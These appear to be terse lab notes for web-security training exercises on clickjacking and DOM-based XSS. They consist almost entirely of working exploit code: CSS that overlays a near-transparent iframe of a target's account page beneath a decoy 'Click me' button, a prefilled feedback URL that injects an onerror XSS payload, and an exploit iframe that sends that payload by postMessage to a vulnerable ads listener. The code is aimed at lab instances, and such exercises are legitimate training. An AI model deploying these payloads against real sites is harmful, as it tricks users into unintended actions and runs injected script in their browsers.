Click jacking

Lab: Basic clickjacking with CSRF token protection

<style>
    iframe {
        position:relative;
        width:700px;
        height: 500px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:400px;
        left:60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a0700e40484434d81eb262a00f20067.web-security-academy.net/my-account"></iframe>

<style>
    iframe {
        position:relative;
        width:700px;
        height: 500px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:410px;
        left:80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe
src="https://0a7100ad033a81ce80eabd7200b10064.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

<!-- victim script -->
<!-- Ads to be inserted here -->
    <div id='ads'>
    </div>
    <script>
        window.addEventListener('message', function(e) {
            document.getElementById('ads').innerHTML = e.data;
        })
    </script>

<!-- exploit server -->
<iframe src="https://0a4e00fd03dfaaf680db26b300e00060.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">